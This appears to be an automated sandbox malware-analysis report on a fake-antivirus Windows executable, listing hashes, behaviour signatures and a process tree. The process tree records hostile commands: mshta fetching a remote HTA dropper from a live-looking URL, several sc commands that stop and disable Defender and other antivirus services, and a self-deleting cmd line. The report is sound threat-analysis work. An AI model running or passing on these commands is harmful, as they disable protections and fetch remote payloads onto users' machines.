Analysis

  • max time kernel
    150s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    23-11-2022 14:25

General

  • Target

    47c724ea55ddc401dbebafea545d6ac7bb32ed2b82b1c12b7083882b5d814add.exe

  • Size

    2.1MB

  • MD5

    35196950b0867c43806fa94079cab673

  • SHA1

    2aba0a0a23a6cae9c39cffb822b57118215322f4

  • SHA256

    47c724ea55ddc401dbebafea545d6ac7bb32ed2b82b1c12b7083882b5d814add

  • SHA512

    ece02cc0170abbdb52c5ef98b4f124a4306d0a59fc2362144ed6974e9e76b89fdc782e47652b8daf9f3a3196cb7a6e4286c0bc7102cbc2858f2f40f03332abd2

  • SSDEEP

    49152:PggbSSPtE48gHHZa75zWUuDLOH6rQLeVC:pZ8gZatWUuf46rsR

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://galaint.statonlinekit.in/?0=127&1=0&2=1&3=95&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=1111&12=hlftlipwpt&14=1

Signatures

  • UAC bypass 3 TTPs 3 IoCs
  • Disables taskbar notifications via registry modification
  • Executes dropped EXE 1 IoCs
  • Sets file execution options in registry 2 TTPs 64 IoCs
  • Stops running service(s) 3 TTPs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops file in System32 directory 3 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 52 IoCs
  • System policy modification 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\47c724ea55ddc401dbebafea545d6ac7bb32ed2b82b1c12b7083882b5d814add.exe
    "C:\Users\Admin\AppData\Local\Temp\47c724ea55ddc401dbebafea545d6ac7bb32ed2b82b1c12b7083882b5d814add.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1084
    • C:\Users\Admin\AppData\Roaming\Protector-wrwj.exe
      C:\Users\Admin\AppData\Roaming\Protector-wrwj.exe
      2⤵
      • UAC bypass
      • Executes dropped EXE
      • Sets file execution options in registry
      • Adds Run key to start application
      • Checks whether UAC is enabled
      • Drops file in System32 directory
      • Modifies Internet Explorer settings
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      • System policy modification
      PID:1144
      • C:\Windows\SysWOW64\mshta.exe
        mshta.exe "http://galaint.statonlinekit.in/?0=127&1=0&2=1&3=95&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=1111&12=hlftlipwpt&14=1"
        3⤵
        • Modifies Internet Explorer settings
        PID:2044
      • C:\Windows\SysWOW64\sc.exe
        sc stop WinDefend
        3⤵
        • Launches sc.exe
        PID:2000
      • C:\Windows\SysWOW64\sc.exe
        sc config WinDefend start= disabled
        3⤵
        • Launches sc.exe
        PID:1696
      • C:\Windows\SysWOW64\sc.exe
        sc stop msmpsvc
        3⤵
        • Launches sc.exe
        PID:1664
      • C:\Windows\SysWOW64\sc.exe
        sc config GuardX start= disabled
        3⤵
        • Launches sc.exe
        PID:1764
      • C:\Windows\SysWOW64\sc.exe
        sc stop GuardX
        3⤵
        • Launches sc.exe
        PID:964
      • C:\Windows\SysWOW64\sc.exe
        sc config AntiVirSchedulerService start= disabled
        3⤵
        • Launches sc.exe
        PID:908
      • C:\Windows\SysWOW64\sc.exe
        sc config AntiVirService start= disabled
        3⤵
        • Launches sc.exe
        PID:648
      • C:\Windows\SysWOW64\sc.exe
        sc stop AntiVirService
        3⤵
        • Launches sc.exe
        PID:604
      • C:\Windows\SysWOW64\sc.exe
        sc config ekrn start= disabled
        3⤵
        • Launches sc.exe
        PID:1108
      • C:\Windows\SysWOW64\sc.exe
        sc config msmpsvc start= disabled
        3⤵
        • Launches sc.exe
        PID:1928
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\47C724~1.EXE" >> NUL
      2⤵
        PID:1900

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Protector-wrwj.exe

      Filesize

      2.1MB

      MD5

      35196950b0867c43806fa94079cab673

      SHA1

      2aba0a0a23a6cae9c39cffb822b57118215322f4

      SHA256

      47c724ea55ddc401dbebafea545d6ac7bb32ed2b82b1c12b7083882b5d814add

      SHA512

      ece02cc0170abbdb52c5ef98b4f124a4306d0a59fc2362144ed6974e9e76b89fdc782e47652b8daf9f3a3196cb7a6e4286c0bc7102cbc2858f2f40f03332abd2

    • C:\Users\Admin\AppData\Roaming\Protector-wrwj.exe

      Filesize

      2.1MB

      MD5

      35196950b0867c43806fa94079cab673

      SHA1

      2aba0a0a23a6cae9c39cffb822b57118215322f4

      SHA256

      47c724ea55ddc401dbebafea545d6ac7bb32ed2b82b1c12b7083882b5d814add

      SHA512

      ece02cc0170abbdb52c5ef98b4f124a4306d0a59fc2362144ed6974e9e76b89fdc782e47652b8daf9f3a3196cb7a6e4286c0bc7102cbc2858f2f40f03332abd2

    • \Users\Admin\AppData\Roaming\Protector-wrwj.exe

      Filesize

      2.1MB

      MD5

      35196950b0867c43806fa94079cab673

      SHA1

      2aba0a0a23a6cae9c39cffb822b57118215322f4

      SHA256

      47c724ea55ddc401dbebafea545d6ac7bb32ed2b82b1c12b7083882b5d814add

      SHA512

      ece02cc0170abbdb52c5ef98b4f124a4306d0a59fc2362144ed6974e9e76b89fdc782e47652b8daf9f3a3196cb7a6e4286c0bc7102cbc2858f2f40f03332abd2

    • \Users\Admin\AppData\Roaming\Protector-wrwj.exe

      Filesize

      2.1MB

      MD5

      35196950b0867c43806fa94079cab673

      SHA1

      2aba0a0a23a6cae9c39cffb822b57118215322f4

      SHA256

      47c724ea55ddc401dbebafea545d6ac7bb32ed2b82b1c12b7083882b5d814add

      SHA512

      ece02cc0170abbdb52c5ef98b4f124a4306d0a59fc2362144ed6974e9e76b89fdc782e47652b8daf9f3a3196cb7a6e4286c0bc7102cbc2858f2f40f03332abd2

    • memory/604-81-0x0000000000000000-mapping.dmp

    • memory/648-82-0x0000000000000000-mapping.dmp

    • memory/908-83-0x0000000000000000-mapping.dmp

    • memory/964-84-0x0000000000000000-mapping.dmp

    • memory/1084-55-0x0000000000400000-0x0000000000747000-memory.dmp

      Filesize

      3.3MB

    • memory/1084-63-0x0000000000400000-0x0000000000969000-memory.dmp

      Filesize

      5.4MB

    • memory/1084-56-0x0000000000400000-0x0000000000969000-memory.dmp

      Filesize

      5.4MB

    • memory/1084-65-0x0000000000400000-0x0000000000747000-memory.dmp

      Filesize

      3.3MB

    • memory/1084-58-0x0000000000400000-0x0000000000969000-memory.dmp

      Filesize

      5.4MB

    • memory/1084-66-0x00000000745E0000-0x0000000074659000-memory.dmp

      Filesize

      484KB

    • memory/1084-54-0x0000000074C91000-0x0000000074C93000-memory.dmp

      Filesize

      8KB

    • memory/1084-57-0x00000000745E0000-0x0000000074659000-memory.dmp

      Filesize

      484KB

    • memory/1108-80-0x0000000000000000-mapping.dmp

    • memory/1144-87-0x0000000005D10000-0x0000000006D72000-memory.dmp

      Filesize

      16.4MB

    • memory/1144-74-0x0000000000400000-0x0000000000969000-memory.dmp

      Filesize

      5.4MB

    • memory/1144-75-0x0000000000400000-0x0000000000969000-memory.dmp

      Filesize

      5.4MB

    • memory/1144-71-0x0000000000400000-0x0000000000969000-memory.dmp

      Filesize

      5.4MB

    • memory/1144-86-0x00000000050C0000-0x0000000005B7A000-memory.dmp

      Filesize

      10.7MB

    • memory/1144-61-0x0000000000000000-mapping.dmp

    • memory/1144-70-0x00000000745E0000-0x0000000074659000-memory.dmp

      Filesize

      484KB

    • memory/1144-67-0x0000000000400000-0x0000000000969000-memory.dmp

      Filesize

      5.4MB

    • memory/1664-78-0x0000000000000000-mapping.dmp

    • memory/1696-77-0x0000000000000000-mapping.dmp

    • memory/1764-85-0x0000000000000000-mapping.dmp

    • memory/1900-64-0x0000000000000000-mapping.dmp

    • memory/1928-79-0x0000000000000000-mapping.dmp

    • memory/2000-76-0x0000000000000000-mapping.dmp

    • memory/2044-73-0x0000000000000000-mapping.dmp